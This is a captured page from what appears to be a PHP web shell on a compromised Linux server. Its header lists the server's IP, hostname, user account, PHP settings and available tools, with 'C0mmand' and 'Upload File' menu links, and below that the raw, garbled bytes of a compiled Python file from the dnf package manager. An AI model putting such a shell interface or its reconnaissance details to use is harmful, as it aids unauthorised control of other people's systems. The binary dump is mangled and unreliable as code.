Server IP : 184.107.3.203 / Your IP : 216.73.216.51 Web Server : Apache System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64 User : adminteladeoro ( 1015) PHP Version : 8.2.28 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/lib/python3.6/site-packages/dnf/cli/commands/__pycache__/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
3 �ft`s � @ s` d dl mZ d dl mZ d dlmZ d dlmZ d dlZd dl Z e j d�ZG dd� dej�Z dS ) � )�absolute_import)�unicode_literals)�_)�commandsN�dnfc @ sL e Zd ZdZdZed�jejj d�Z edd� �Zdd� Z d d � Zdd� Zd S )�SwapCommandzNA class containing methods needed by the cli to execute the swap command. �swapz=run an interactive {prog} mod for remove and install one spec)�progc C s, | j ddtd�d� | j ddtd�d� d S )N�remove_specZstorezThe specs that will be removed)�action�help�install_specz The specs that will be installed)�add_argumentr )�parser� r �/usr/lib/python3.6/swap.py� set_argparser&